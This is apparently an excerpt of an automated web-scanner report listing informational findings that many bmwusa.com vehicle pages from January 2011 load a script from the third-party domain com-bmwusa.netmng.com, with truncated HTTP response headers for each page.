Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:08 GMT;path=/
Content-Length: 201935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.204. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/760lisedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:23:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:43:27 GMT;path=/
Content-Length: 257095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.205. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:25:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:25 GMT;path=/
Content-Length: 231691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.206. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:25:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:15 GMT;path=/
Content-Length: 231692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.207. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:24:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:44:30 GMT;path=/
Content-Length: 215290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.208. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:24:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:44:06 GMT;path=/
Content-Length: 215291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.209. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:49:41 GMT;path=/
Content-Length: 202033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.210. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:37 GMT;path=/
Content-Length: 212053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.211. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:26:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:46:00 GMT;path=/
Content-Length: 212054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.212. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:33 GMT;path=/
Content-Length: 229185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.213. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:14 GMT;path=/
Content-Length: 229186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.214. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:47:34 GMT;path=/
Content-Length: 215354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.215. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:47:33 GMT;path=/
Content-Length: 215355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.216. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:31:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:51:30 GMT;path=/
Content-Length: 202064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.217. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:33:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:53:18 GMT;path=/
Content-Length: 212078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.218. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:38 GMT;path=/
Content-Length: 212079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.219. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:32:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:52:23 GMT;path=/
Content-Length: 229552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.220. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:31:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:51:40 GMT;path=/
Content-Length: 229553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.221. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:51 GMT;path=/
Content-Length: 215531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.222. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:44 GMT;path=/
Content-Length: 215532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.223. http://www.bmwusa.com/standard/content/vehicles/2011/7/allnew7series.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/allnew7series.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:05:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:25:58 GMT;path=/
Content-Length: 179251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.224. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:59 GMT;path=/
Content-Length: 222823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.225. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:18 GMT;path=/
Content-Length: 222824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.226. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/alpinab7/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:42 GMT;path=/
Content-Length: 256070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.227. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/alpinab7/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:13 GMT;path=/
Content-Length: 256071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.228. http://www.bmwusa.com/standard/content/vehicles/2011/7/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:33 GMT;path=/
Content-Length: 204497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.229. http://www.bmwusa.com/standard/content/vehicles/2011/x3/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:37:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:20 GMT;path=/
Content-Length: 194389

